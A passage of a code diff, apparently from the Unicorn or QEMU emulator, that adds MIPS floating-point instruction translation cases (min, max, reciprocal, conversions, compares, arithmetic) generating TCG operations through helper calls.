case OPC_CLASS_S: + check_insn(ctx, ISA_MIPS32R6); + { + 
TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_class_s(tcg_ctx, fp0, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "class.s"; + } + break; + case OPC_MIN_S: /* OPC_RECIP2_S */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MIN_S */ + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_min_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "min.s"; + } else { + /* OPC_RECIP2_S */ + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_recip2_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "recip2.s"; + } + break; + case OPC_MINA_S: /* OPC_RECIP1_S */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MINA_S */ + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_mina_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "mina.s"; + } else { + /* OPC_RECIP1_S */ + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_recip1_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "recip1.s"; + } + break; + 
case OPC_MAX_S: /* OPC_RSQRT1_S */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MAX_S */ + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_max_s(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr32(ctx, fp1, fd); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "max.s"; + } else { + /* OPC_RSQRT1_S */ + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_rsqrt1_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "rsqrt1.s"; + } + break; + case OPC_MAXA_S: /* OPC_RSQRT2_S */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MAXA_S */ + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_maxa_s(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr32(ctx, fp1, fd); + tcg_temp_free_i32(tcg_ctx, fp1); + tcg_temp_free_i32(tcg_ctx, fp0); + opn = "maxa.s"; + } else { + /* OPC_RSQRT2_S */ + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_helper_float_rsqrt2_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "rsqrt2.s"; + } + break; + case OPC_CVT_D_S: + check_cp1_registers(ctx, fd); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_cvtd_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "cvt.d.s"; + break; 
+ case OPC_CVT_W_S: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_cvtw_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "cvt.w.s"; + break; + case OPC_CVT_L_S: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_cvtl_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "cvt.l.s"; + break; + case OPC_CVT_PS_S: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + TCGv_i32 fp32_0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp32_1 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp32_0, fs); + gen_load_fpr32(ctx, fp32_1, ft); + tcg_gen_concat_i32_i64(tcg_ctx, fp64, fp32_1, fp32_0); + tcg_temp_free_i32(tcg_ctx, fp32_1); + tcg_temp_free_i32(tcg_ctx, fp32_0); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "cvt.ps.s"; + break; + case OPC_CMP_F_S: + case OPC_CMP_UN_S: + case OPC_CMP_EQ_S: + case OPC_CMP_UEQ_S: + case OPC_CMP_OLT_S: + case OPC_CMP_ULT_S: + case OPC_CMP_OLE_S: + case OPC_CMP_ULE_S: + case OPC_CMP_SF_S: + case OPC_CMP_NGLE_S: + case OPC_CMP_SEQ_S: + case OPC_CMP_NGL_S: + case OPC_CMP_LT_S: + case OPC_CMP_NGE_S: + case OPC_CMP_LE_S: + case OPC_CMP_NGT_S: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + if (ctx->opcode & (1 << 6)) { + gen_cmpabs_s(ctx, func-48, ft, fs, cc); + opn = condnames_abs[func-48]; + } else { + gen_cmp_s(ctx, func-48, ft, fs, cc); + opn = condnames[func-48]; + } + break; + case OPC_ADD_D: + check_cp1_registers(ctx, fs | ft | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + 
gen_helper_float_add_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "add.d"; + optype = BINOP; + break; + case OPC_SUB_D: + check_cp1_registers(ctx, fs | ft | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_sub_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "sub.d"; + optype = BINOP; + break; + case OPC_MUL_D: + check_cp1_registers(ctx, fs | ft | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_mul_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "mul.d"; + optype = BINOP; + break; + case OPC_DIV_D: + check_cp1_registers(ctx, fs | ft | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_div_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "div.d"; + optype = BINOP; + break; + case OPC_SQRT_D: + check_cp1_registers(ctx, fs | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_sqrt_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "sqrt.d"; + break; + case OPC_ABS_D: + check_cp1_registers(ctx, fs | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_abs_d(tcg_ctx, 
fp0, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "abs.d"; + break; + case OPC_MOV_D: + check_cp1_registers(ctx, fs | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "mov.d"; + break; + case OPC_NEG_D: + check_cp1_registers(ctx, fs | fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_chs_d(tcg_ctx, fp0, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "neg.d"; + break; + case OPC_ROUND_L_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_roundl_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "round.l.d"; + break; + case OPC_TRUNC_L_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_truncl_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "trunc.l.d"; + break; + case OPC_CEIL_L_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_ceill_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "ceil.l.d"; + break; + case OPC_FLOOR_L_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_floorl_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "floor.l.d"; + break; + case OPC_ROUND_W_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, 
fs); + gen_helper_float_roundw_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "round.w.d"; + break; + case OPC_TRUNC_W_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_truncw_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "trunc.w.d"; + break; + case OPC_CEIL_W_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_ceilw_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "ceil.w.d"; + break; + case OPC_FLOOR_W_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_floorw_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "floor.w.d"; + break; + case OPC_SEL_D: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_d(ctx, op1, fd, ft, fs); + opn = "sel.d"; + break; + case OPC_SELEQZ_D: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_d(ctx, op1, fd, ft, fs); + opn = "seleqz.d"; + break; + case OPC_SELNEZ_D: + check_insn(ctx, ISA_MIPS32R6); + gen_sel_d(ctx, op1, fd, ft, fs); + opn = "selnez.d"; + break; + case OPC_MOVCF_D: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + gen_movcf_d(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); + opn = "movcf.d"; + break; + case OPC_MOVZ_D: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i64 fp0; + 
+ if (ft != 0) { + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, *cpu_gpr[ft], 0, l1); + } + fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + opn = "movz.d"; + break; + case OPC_MOVN_D: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + { + int l1 = gen_new_label(tcg_ctx); + TCGv_i64 fp0; + + if (ft != 0) { + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, *cpu_gpr[ft], 0, l1); + fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + gen_set_label(tcg_ctx, l1); + } + } + opn = "movn.d"; + break; + case OPC_RECIP_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_recip_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "recip.d"; + break; + case OPC_RSQRT_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_rsqrt_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "rsqrt.d"; + break; + case OPC_MADDF_D: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fd); + gen_helper_float_maddf_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "maddf.d"; + } + break; + case OPC_MSUBF_D: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + 
gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fd); + gen_helper_float_msubf_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "msubf.d"; + } + break; + case OPC_RINT_D: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_rint_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "rint.d"; + } + break; + case OPC_CLASS_D: + check_insn(ctx, ISA_MIPS32R6); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_class_d(tcg_ctx, fp0, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "class.d"; + } + break; + case OPC_MIN_D: /* OPC_RECIP2_D */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MIN_D */ + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_min_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr64(ctx, fp1, fd); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "min.d"; + } else { + /* OPC_RECIP2_D */ + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_recip2_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "recip2.d"; + } + break; + case OPC_MINA_D: /* OPC_RECIP1_D */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MINA_D */ + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + 
gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_mina_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr64(ctx, fp1, fd); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "mina.d"; + } else { + /* OPC_RECIP1_D */ + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_recip1_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "recip1.d"; + } + break; + case OPC_MAX_D: /* OPC_RSQRT1_D */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MAX_D */ + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_max_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr64(ctx, fp1, fd); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "max.d"; + } else { + /* OPC_RSQRT1_D */ + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_rsqrt1_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "rsqrt1.d"; + } + break; + case OPC_MAXA_D: /* OPC_RSQRT2_D */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_MAXA_D */ + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_maxa_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); + gen_store_fpr64(ctx, fp1, fd); + tcg_temp_free_i64(tcg_ctx, fp1); + tcg_temp_free_i64(tcg_ctx, fp0); + opn = "maxa.d"; + } else { + /* OPC_RSQRT2_D */ + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_rsqrt2_d(tcg_ctx, fp0, tcg_ctx->cpu_env, 
fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "rsqrt2.d"; + } + break; + case OPC_CMP_F_D: + case OPC_CMP_UN_D: + case OPC_CMP_EQ_D: + case OPC_CMP_UEQ_D: + case OPC_CMP_OLT_D: + case OPC_CMP_ULT_D: + case OPC_CMP_OLE_D: + case OPC_CMP_ULE_D: + case OPC_CMP_SF_D: + case OPC_CMP_NGLE_D: + case OPC_CMP_SEQ_D: + case OPC_CMP_NGL_D: + case OPC_CMP_LT_D: + case OPC_CMP_NGE_D: + case OPC_CMP_LE_D: + case OPC_CMP_NGT_D: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + if (ctx->opcode & (1 << 6)) { + gen_cmpabs_d(ctx, func-48, ft, fs, cc); + opn = condnames_abs[func-48]; + } else { + gen_cmp_d(ctx, func-48, ft, fs, cc); + opn = condnames[func-48]; + } + break; + case OPC_CVT_S_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_cvts_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "cvt.s.d"; + break; + case OPC_CVT_W_D: + check_cp1_registers(ctx, fs); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_cvtw_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "cvt.w.d"; + break; + case OPC_CVT_L_D: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_cvtl_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "cvt.l.d"; + break; + case OPC_CVT_S_W: + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_helper_float_cvts_w(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr32(ctx, fp0, 
fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "cvt.s.w"; + break; + case OPC_CVT_D_W: + check_cp1_registers(ctx, fd); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr32(ctx, fp32, fs); + gen_helper_float_cvtd_w(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); + tcg_temp_free_i32(tcg_ctx, fp32); + gen_store_fpr64(ctx, fp64, fd); + tcg_temp_free_i64(tcg_ctx, fp64); + } + opn = "cvt.d.w"; + break; + case OPC_CVT_S_L: + check_cp1_64bitmode(ctx); + { + TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp64, fs); + gen_helper_float_cvts_l(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); + tcg_temp_free_i64(tcg_ctx, fp64); + gen_store_fpr32(ctx, fp32, fd); + tcg_temp_free_i32(tcg_ctx, fp32); + } + opn = "cvt.s.l"; + break; + case OPC_CVT_D_L: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_cvtd_l(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "cvt.d.l"; + break; + case OPC_CVT_PS_PW: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_helper_float_cvtps_pw(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "cvt.ps.pw"; + break; + case OPC_ADD_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_helper_float_add_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = 